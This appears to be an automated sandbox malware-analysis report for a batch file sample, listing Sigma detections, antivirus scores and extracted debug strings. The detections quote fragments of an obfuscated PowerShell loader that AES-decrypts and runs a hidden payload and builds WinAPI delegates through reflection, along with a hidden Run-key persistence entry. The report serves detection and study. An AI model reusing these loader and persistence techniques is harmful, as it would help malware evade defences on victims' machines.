'');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4556, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: Powershell Execute Batch Script

Source: Script Block Logging

Author: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, data4:

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2844, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6332, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1284, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 1.cmd

Virustotal: Detection: 14%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

35_2_00401000

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
